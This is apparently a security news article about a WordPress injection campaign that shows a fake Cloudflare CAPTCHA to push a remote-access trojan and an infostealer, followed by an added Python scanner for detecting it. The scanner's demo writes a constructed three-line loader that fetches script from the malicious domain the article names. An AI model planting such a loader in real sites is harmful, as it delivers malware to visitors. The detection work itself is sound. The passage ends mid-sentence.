Hackers use fake CloudFlare captcha to hide Trojan download

Sucuri is tracking the evolution of a campaign, launched in August, that delivers a RAT together with an infostealer via drive-by download. The attackers inject JavaScript into WordPress sites; the script displays a fake Cloudflare security page and prompts the visitor to download some software to complete the "check".

The malicious JavaScript is injected by appending three lines of code to CMS core components, theme files or plugin files. The number of sites infected in the new wave is small – fewer than 1,000; in almost half of the cases, the injected code was found in /wp-includes/js/jquery/jquery.min.js.

Previously, this script fetched the content it needed (at the time, a fake Cloudflare DDoS protection warning) from the adogeevent[.]com domain. The new JavaScript variants request different domains, although they still resolve to the same IP address.
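A defender-side check for the two traits described above (a few lines appended to a WordPress JS file, and a call-out to a foreign domain), written here as an added example rather than code from Sucuri or the article; the allowlist of legitimate hosts is a hypothetical starting point, and the sample tree it scans is constructed inline:

```python
import re
import tempfile
from pathlib import Path

# Indicator quoted in the article, stored defanged and normalised on load.
KNOWN_BAD_HOSTS = {"adogeevent[.]com".replace("[.]", ".")}
# Hosts that legitimately appear in WordPress core and jQuery sources.
# Hypothetical starting allowlist: rebuild it from a clean install of the same version.
ALLOWED_HOSTS = {"jquery.com", "jquery.org", "sizzlejs.com", "wordpress.org", "w3.org", "github.com"}
HOST_RE = re.compile(r"https?://([a-z0-9.-]+\.[a-z]{2,})", re.I)

def suspicious_hosts(text):
    """Hosts referenced by absolute URL that are known-bad or absent from the allowlist."""
    found = {h.lower() for h in HOST_RE.findall(text)}
    def allowed(h):
        return any(h == a or h.endswith("." + a) for a in ALLOWED_HOSTS)
    return {h for h in found if h in KNOWN_BAD_HOSTS or not allowed(h)}

def scan_tree(root):
    """Walk a WordPress tree; report JS files that call out to foreign hosts or were appended to."""
    findings = []
    for path in sorted(Path(root).rglob("*.js")):
        text = path.read_text(errors="replace")
        rel = path.relative_to(root).as_posix()
        for host in sorted(suspicious_hosts(text)):
            findings.append((rel, "references " + host))
        # A .min.js file is normally a licence comment plus one long line. The campaign
        # appends three lines, so a minified file with more than two lines stands out.
        if path.name.endswith(".min.js") and len(text.splitlines()) > 2:
            findings.append((rel, "extra lines appended to minified file"))
    return findings

def demo():
    """Constructed mini WordPress tree: one clean theme script, one injected jquery.min.js."""
    clean = ("/*! jQuery v3.6.0 | (c) OpenJS Foundation | jquery.org/license */\n"
             "!function(e,t){e.jQuery=t}(window,{});\n")
    # Stand-in for the appended three-line loader the article describes (constructed sample).
    injected = clean + ("var s=document.createElement('script');\n"
                        "s.src='https://" + next(iter(KNOWN_BAD_HOSTS)) + "/v1.js';\n"
                        "document.head.appendChild(s);\n")
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "wp-includes/js/jquery").mkdir(parents=True)
        (root / "wp-includes/js/jquery/jquery.min.js").write_text(injected)
        (root / "wp-content/themes/demo").mkdir(parents=True)
        (root / "wp-content/themes/demo/theme.min.js").write_text(clean)
        return scan_tree(root)
```

Run `scan_tree` against a real document root and compare flagged files with a clean copy of the same WordPress version before cleaning them up, since the allowlist is only a heuristic.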

The downloaded content has also changed: the visitor is now shown a CAPTCHA dialog that purports to come from Cloudflare's servers.

When you enter any value in the specified field (even the correct one), a hint pops up: to gain access to the site,